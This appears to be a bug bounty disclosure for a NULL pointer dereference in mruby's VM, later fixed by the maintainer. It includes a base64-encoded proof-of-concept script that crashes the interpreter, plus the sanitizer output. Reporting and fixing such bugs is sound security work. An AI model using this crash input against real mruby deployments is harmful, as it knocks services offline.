NULL Pointer Dereference in mruby/mruby

Valid

Reported on

Mar 7th 2022


Description

There is a NULL Pointer Dereference in mrb_vm_exec (vm.c:1929). This bug has been found on mruby lastest commit (hash c2f7ed514dfa0fcae2e7e72d51f25be3d3d6d72c) on Ubuntu 20.04 for x86_64/amd64.

Proof of Concept

1- Clone repo and build with ASAN using MRUBY_CONFIG=build_config/clang-asan.rb rake.

2- Use mruby to execute the poc (it is base64-encoded since it contains unprintable characters):

$ echo -ne 'Yj0iMCIKezA9Pm5pbH0KW11hbmQKYi5jb2RlcG9pbnRze2luc3RhbmNlX2V2YWx7bG9vcC5uZXh0
e30KYi5jb2RlcG9pbnRze0ZpYmVyLm5ld3t9LnRyYW5zZmVyKDAsMCwwLDAsMCwwLDAsMCwwLDAs
MCwwLDAsMCwwKX19fQ==' | base64 -d > poc
$ mruby poc
/home/faraday/mruby/src/vm.c:1929:16: runtime error: member access within misaligned address 0x000000000001 for type 'struct RArray', which requires 8 byte alignment
0x000000000001: note: pointer points here
<memory cannot be printed>
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /home/faraday/mruby/src/vm.c:1929:16 in 
AddressSanitizer:DEADLYSIGNAL
=================================================================
==36117==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000011 (pc 0x0000006f01ea bp 0x7fffb088c190 sp 0x7fffb086aa60 T0)
==36117==The signal is caused by a READ memory access.
==36117==Hint: address points to the zero page.
    #0 0x6f01ea in mrb_vm_exec /home/faraday/mruby/src/vm.c:1929:16
    #1 0x6b0ca9 in mrb_vm_run /home/faraday/mruby/src/vm.c:1130:12
    #2 0x6a5a79 in mrb_top_run /home/faraday/mruby/src/vm.c:3039:12
    #3 0x8b0ef1 in mrb_load_exec /home/faraday/mruby/mrbgems/mruby-compiler/core/parse.y:6890:7
    #4 0x8b2b56 in mrb_load_detect_file_cxt /home/faraday/mruby/mrbgems/mruby-compiler/core/parse.y:6933:12
    #5 0x4c6420 in main /home/faraday/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:357:11
    #6 0x7f8c3f9ff0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #7 0x41c85d in _start (/home/faraday/mruby/build/host/bin/mruby+0x41c85d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/faraday/mruby/src/vm.c:1929:16 in mrb_vm_exec
==36117==ABORTING

Impact

This vulnerability is capable of making the mruby interpreter crash, thus affecting the availability of the system.

Acknowledgements

This bug was found by Octavio Gianatiempo (ogianatiempo@faradaysec.com) and Octavio Galland (ogalland@faradaysec.com) from Faraday Research Team.

We are processing your report and will contact the mruby team within 24 hours. 9 months ago
We have contacted a member of the mruby team and are waiting to hear back 9 months ago
Yukihiro "Matz" Matsumoto validated this vulnerability 9 months ago
octaviogalland has been awarded the disclosure bounty
The fix bounty is now up for grabs
Yukihiro "Matz" Matsumoto marked this as fixed in 3.2 with commit da48e7 9 months ago
Yukihiro "Matz" Matsumoto has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation